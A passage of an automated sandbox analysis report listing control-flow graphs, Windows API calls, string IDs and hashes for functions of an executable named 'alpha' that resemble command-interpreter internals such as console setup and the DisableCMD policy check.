                                                                                                                    control_flow_graph 821 7ff789bd37d8-7ff789bd3887 GetCurrentThreadId OpenThread call 7ff789bd04f4 HeapSetInformation RegOpenKeyExW 824 7ff789bd388d-7ff789bd38eb call 7ff789bd5920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff789bde9f8-7ff789bdea3b RegQueryValueExW RegCloseKey 821->825 828 7ff789bdea41-7ff789bdea59 GetThreadLocale 824->828 829 7ff789bd38f1-7ff789bd3913 memset 824->829 825->828 830 7ff789bdea74-7ff789bdea77 828->830 831 7ff789bdea5b-7ff789bdea67 828->831 832 7ff789bdeaa5 829->832 833 7ff789bd3919-7ff789bd3935 call 7ff789bd4d5c 829->833 834 7ff789bdea94-7ff789bdea96 830->834 835 7ff789bdea79-7ff789bdea7d 830->835 831->830 838 7ff789bdeaa8-7ff789bdeab4 832->838 841 7ff789bdeae2-7ff789bdeaff call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 833->841 842 7ff789bd393b-7ff789bd3942 833->842 834->832 835->834 837 7ff789bdea7f-7ff789bdea89 835->837 837->834 838->833 840 7ff789bdeaba-7ff789bdeac3 838->840 843 7ff789bdeacb-7ff789bdeace 840->843 853 7ff789bdeb00-7ff789bdeb0d 841->853 847 7ff789bdeb27-7ff789bdeb40 _setjmp 842->847 848 7ff789bd3948-7ff789bd3962 _setjmp 842->848 844 7ff789bdeac5-7ff789bdeac9 843->844 845 7ff789bdead0-7ff789bdeadb 843->845 844->843 845->838 851 7ff789bdeadd 845->851 849 7ff789bdeb46-7ff789bdeb49 847->849 850 7ff789bd39fe-7ff789bd3a05 call 7ff789bd4c1c 847->850 848->853 854 7ff789bd3968-7ff789bd396d 848->854 855 7ff789bdeb66-7ff789bdeb6f call 7ff789bd01b8 849->855 856 7ff789bdeb4b-7ff789bdeb65 call 7ff789bc3240 call 7ff789be8530 call 7ff789bd4c1c 849->856 850->825 851->833 866 7ff789bdeb15-7ff789bdeb1f call 7ff789bd4c1c 853->866 858 7ff789bd396f 854->858 859 7ff789bd39b9-7ff789bd39bb 854->859 880 7ff789bdeb71-7ff789bdeb82 _setmode 855->880 881 7ff789bdeb87-7ff789bdeb89 call 7ff789bd86f0 855->881 856->855 867 7ff789bd3972-7ff789bd397d 858->867 862 7ff789bdeb20 859->862 863 7ff789bd39c1-7ff789bd39c3 call 7ff789bd4c1c 859->863 862->847 877 7ff789bd39c8 863->877 866->862 874 7ff789bd397f-7ff789bd3984 867->874 875 7ff789bd39c9-7ff789bd39de call 7ff789bcdf60 867->875 874->867 883 7ff789bd3986-7ff789bd39ae call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 874->883 875->866 889 7ff789bd39e4-7ff789bd39e8 875->889 877->875 880->881 890 7ff789bdeb8e-7ff789bdebad call 7ff789bd58e4 call 7ff789bcdf60 881->890 897 7ff789bd39b3 883->897 889->850 894 7ff789bd39ea-7ff789bd39ef call 7ff789bcbe00 889->894 902 7ff789bdebaf-7ff789bdebb3 890->902 900 7ff789bd39f4-7ff789bd39fc 894->900 897->859 900->874 902->850 903 7ff789bdebb9-7ff789bdec24 call 7ff789bd58e4 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 call 7ff789bcbe00 call 7ff789bd0580 GetConsoleOutputCP GetCPInfo call 7ff789bd04f4 902->903 903->890
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                    • API String ID: 2624720099-1920437939
                                                                                                                    • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction ID: 2436aa6c33d83ad91ce85a9e07408ea0eefe66a246b40004408f7d46e0cdb038
                                                                                                                    • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction Fuzzy Hash: CAC18C31E0868A8AF754BF7094481B8FEB1FF49F56FE44138DA1E46696EE3DA441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1118 7ff789bd823c-7ff789bd829b FindFirstFileExW 1119 7ff789bd82cd-7ff789bd82df 1118->1119 1120 7ff789bd829d-7ff789bd82a9 GetLastError 1118->1120 1124 7ff789bd8365-7ff789bd837b FindNextFileW 1119->1124 1125 7ff789bd82e5-7ff789bd82ee 1119->1125 1121 7ff789bd82af 1120->1121 1122 7ff789bd82b1-7ff789bd82cb 1121->1122 1126 7ff789bd83d0-7ff789bd83e5 FindClose 1124->1126 1127 7ff789bd837d-7ff789bd8380 1124->1127 1128 7ff789bd82f1-7ff789bd82f4 1125->1128 1126->1128 1127->1119 1129 7ff789bd8386 1127->1129 1130 7ff789bd82f6-7ff789bd8300 1128->1130 1131 7ff789bd8329-7ff789bd832b 1128->1131 1129->1120 1133 7ff789bd8332-7ff789bd8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff789bd8302-7ff789bd830e 1130->1134 1131->1121 1132 7ff789bd832d 1131->1132 1132->1120 1135 7ff789bd8356-7ff789bd8363 1133->1135 1136 7ff789bd8310-7ff789bd8313 1134->1136 1137 7ff789bd838b-7ff789bd83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff789bd8315-7ff789bd8323 1136->1140 1141 7ff789bd8327 1136->1141 1138 7ff789be50f8-7ff789be511e GetLastError FindClose 1137->1138 1139 7ff789bd83c8-7ff789bd83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 873889042-0
                                                                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction ID: 196cf54ec60c38fdba15b431657db5115ae316bfc1b8da5665afffb6fb90c31e
                                                                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction Fuzzy Hash: 81510776A09B8A86E740AF12E444579BFB0FB8AF92FA48131DA1D43790DF3DE454C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1142 7ff789bd2978-7ff789bd29b6 1143 7ff789bd29b9-7ff789bd29c1 1142->1143 1143->1143 1144 7ff789bd29c3-7ff789bd29c5 1143->1144 1145 7ff789bde441 1144->1145 1146 7ff789bd29cb-7ff789bd29cf 1144->1146 1147 7ff789bd29d2-7ff789bd29da 1146->1147 1148 7ff789bd29dc-7ff789bd29e1 1147->1148 1149 7ff789bd2a1e-7ff789bd2a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff789bd29e3-7ff789bd29eb 1148->1152 1150 7ff789bd2a44-7ff789bd2a5c FindClose 1149->1150 1151 7ff789bde435-7ff789bde439 1149->1151 1153 7ff789bd2ae3-7ff789bd2ae5 1150->1153 1154 7ff789bd2a62-7ff789bd2a6e 1150->1154 1151->1145 1152->1147 1155 7ff789bd29ed-7ff789bd2a1c call 7ff789bd8f80 1152->1155 1157 7ff789bd2aeb-7ff789bd2b10 _wcsnicmp 1153->1157 1158 7ff789bde3f7-7ff789bde3ff 1153->1158 1156 7ff789bd2a70-7ff789bd2a78 1154->1156 1156->1156 1160 7ff789bd2a7a-7ff789bd2a8d 1156->1160 1157->1154 1161 7ff789bd2b16-7ff789bde3f1 _wcsicmp 1157->1161 1160->1145 1163 7ff789bd2a93-7ff789bd2a97 1160->1163 1161->1154 1161->1158 1165 7ff789bde404-7ff789bde407 1163->1165 1166 7ff789bd2a9d-7ff789bd2ade memmove call 7ff789bd13e0 1163->1166 1168 7ff789bde40b-7ff789bde413 1165->1168 1166->1152 1168->1168 1169 7ff789bde415-7ff789bde42b memmove 1168->1169 1169->1151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction ID: 941d9827e2b7c2d94e2c204780a2ef4b77564c7aaa49dac1c8b8b3a0153c21b8
                                                                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction Fuzzy Hash: 56511C61B0868A85EA30AF55954827AEA70FB54FE6FE45234DE6D077D0DF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 643 7ff789bd4d5c-7ff789bd4e4b InitializeCriticalSection call 7ff789bd58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff789bd0580 call 7ff789bd4a14 call 7ff789bd4ad0 call 7ff789bd5554 GetCommandLineW 654 7ff789bd4e4d-7ff789bd4e54 643->654 654->654 655 7ff789bd4e56-7ff789bd4e61 654->655 656 7ff789bd51cf-7ff789bd51e3 call 7ff789bc3278 call 7ff789bd4c1c 655->656 657 7ff789bd4e67-7ff789bd4e7b call 7ff789bd2e44 655->657 663 7ff789bd4e81-7ff789bd4ec3 GetCommandLineW call 7ff789bd13e0 call 7ff789bcca40 657->663 664 7ff789bd51ba-7ff789bd51ce call 7ff789bc3278 call 7ff789bd4c1c 657->664 663->664 674 7ff789bd4ec9-7ff789bd4ee8 call 7ff789bd417c call 7ff789bd2394 663->674 664->656 678 7ff789bd4eed-7ff789bd4ef5 674->678 678->678 679 7ff789bd4ef7-7ff789bd4f1f call 7ff789bcaa54 678->679 682 7ff789bd4f95-7ff789bd4fee GetConsoleOutputCP GetCPInfo call 7ff789bd51ec GetProcessHeap HeapAlloc 679->682 683 7ff789bd4f21-7ff789bd4f30 679->683 688 7ff789bd4ff0-7ff789bd5006 GetConsoleTitleW 682->688 689 7ff789bd5012-7ff789bd5018 682->689 683->682 685 7ff789bd4f32-7ff789bd4f39 683->685 685->682 687 7ff789bd4f3b-7ff789bd4f77 call 7ff789bc3278 GetWindowsDirectoryW 685->687 698 7ff789bd51b1-7ff789bd51b9 call 7ff789bd4c1c 687->698 699 7ff789bd4f7d-7ff789bd4f90 call 7ff789bd3c24 687->699 688->689 691 7ff789bd5008-7ff789bd500f 688->691 692 7ff789bd507a-7ff789bd507e 689->692 693 7ff789bd501a-7ff789bd5024 call 7ff789bd3578 689->693 691->689 695 7ff789bd5080-7ff789bd50b3 call 7ff789beb89c call 7ff789bc586c call 7ff789bc3240 call 7ff789bd3448 692->695 696 7ff789bd50eb-7ff789bd5161 GetModuleHandleW GetProcAddress * 3 692->696 693->692 709 7ff789bd5026-7ff789bd5030 693->709 724 7ff789bd50b5-7ff789bd50d0 call 7ff789bd3448 * 2 695->724 725 7ff789bd50d2-7ff789bd50d7 call 7ff789bc3278 695->725 701 7ff789bd5163-7ff789bd5167 696->701 702 7ff789bd516f 696->702 698->664 699->682 701->702 707 7ff789bd5169-7ff789bd516d 701->707 708 7ff789bd5172-7ff789bd51af free call 7ff789bd8f80 702->708 707->702 707->708 713 7ff789bd5075 call 7ff789becff0 709->713 714 7ff789bd5032-7ff789bd5059 GetStdHandle GetConsoleScreenBufferInfo 709->714 713->692 717 7ff789bd505b-7ff789bd5067 714->717 718 7ff789bd5069-7ff789bd5073 714->718 717->692 718->692 718->713 728 7ff789bd50dc-7ff789bd50e6 GlobalFree 724->728 725->728 728->696
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4D9A
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DBB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DCA
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DE0
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DEE
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E04
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0589
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD059E
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05AF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD05C5
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05EF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD0605
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0632
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD0647
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF789BD4E35), ref: 00007FF789BD55DA
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5623
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5667
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD56BE
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5702
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E35
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E81
                                                                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F69
                                                                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F95
                                                                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FB0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FC1
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FD8
                                                                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FF8
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5037
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD504B
                                                                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50DF
                                                                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50F2
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD510F
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5130
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD514A
                                                                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5175
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                    • API String ID: 3614140610-3021193919
                                                                                                                    • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                                                    • Instruction ID: 22efc88dd552683d3af2fb7c024f1b8c5bdbf79637bb056f4780cf7cfe8c1f69
                                                                                                                    • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                                                    • Instruction Fuzzy Hash: 99C16F61A09A4A96EA44BF21E814178EFB1FF89F92FE48134D90E03795EF3DA445C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 732 7ff789bd3c24-7ff789bd3c61 733 7ff789bd3c67-7ff789bd3c99 call 7ff789bcaf14 call 7ff789bcca40 732->733 734 7ff789bdec5a-7ff789bdec5f 732->734 743 7ff789bd3c9f-7ff789bd3cb2 call 7ff789bcb900 733->743 744 7ff789bdec97-7ff789bdeca1 call 7ff789bd855c 733->744 734->733 736 7ff789bdec65-7ff789bdec6a 734->736 738 7ff789bd412e-7ff789bd415b call 7ff789bd8f80 736->738 743->744 749 7ff789bd3cb8-7ff789bd3cbc 743->749 750 7ff789bd3cbf-7ff789bd3cc7 749->750 750->750 751 7ff789bd3cc9-7ff789bd3ccd 750->751 752 7ff789bd3cd2-7ff789bd3cd8 751->752 753 7ff789bd3ce5-7ff789bd3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff789bd3cda-7ff789bd3cdf 752->754 756 7ff789bd3fb8 753->756 757 7ff789bd3d68-7ff789bd3d6c 753->757 754->753 755 7ff789bd3faa-7ff789bd3fb3 754->755 755->752 759 7ff789bd3fc6-7ff789bd3fec GetLastError call 7ff789bd855c call 7ff789bda5d6 756->759 757->756 758 7ff789bd3d72-7ff789bd3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff789bd3dd3-7ff789bd3ddd 758->760 763 7ff789bd3ff1-7ff789bd4007 call 7ff789bd855c _local_unwind 759->763 762 7ff789bd3de3-7ff789bd3dfb 760->762 760->763 765 7ff789bd3e01-7ff789bd3e11 762->765 766 7ff789bd40fe-7ff789bd4119 call 7ff789bd855c _local_unwind 762->766 773 7ff789bd400c-7ff789bd4022 GetLastError 763->773 765->766 769 7ff789bd3e17-7ff789bd3e28 765->769 775 7ff789bd411a-7ff789bd412c call 7ff789bcff70 call 7ff789bd855c 766->775 772 7ff789bd3e2c-7ff789bd3e34 769->772 772->772 776 7ff789bd3e36-7ff789bd3e3f 772->776 777 7ff789bd3e95-7ff789bd3e9c 773->777 778 7ff789bd4028-7ff789bd402b 773->778 775->738 780 7ff789bd3e42-7ff789bd3e55 776->780 782 7ff789bd3ecf-7ff789bd3ed3 777->782 783 7ff789bd3e9e-7ff789bd3ec2 call 7ff789bd2978 777->783 778->777 781 7ff789bd4031-7ff789bd4047 call 7ff789bd855c _local_unwind 778->781 787 7ff789bd3e66-7ff789bd3e8f GetFileAttributesW 780->787 788 7ff789bd3e57-7ff789bd3e60 780->788 799 7ff789bd404c-7ff789bd4062 call 7ff789bd855c _local_unwind 781->799 785 7ff789bd3ed5-7ff789bd3ef7 GetFileAttributesW 782->785 786 7ff789bd3f08-7ff789bd3f0b 782->786 791 7ff789bd3ec7-7ff789bd3ec9 783->791 793 7ff789bd3efd-7ff789bd3f02 785->793 794 7ff789bd4067-7ff789bd4098 GetLastError call 7ff789bd855c _local_unwind 785->794 795 7ff789bd3f0d-7ff789bd3f11 786->795 796 7ff789bd3f1e-7ff789bd3f40 SetCurrentDirectoryW 786->796 787->773 787->777 788->787 797 7ff789bd3f9d-7ff789bd3fa5 788->797 791->782 791->799 793->786 802 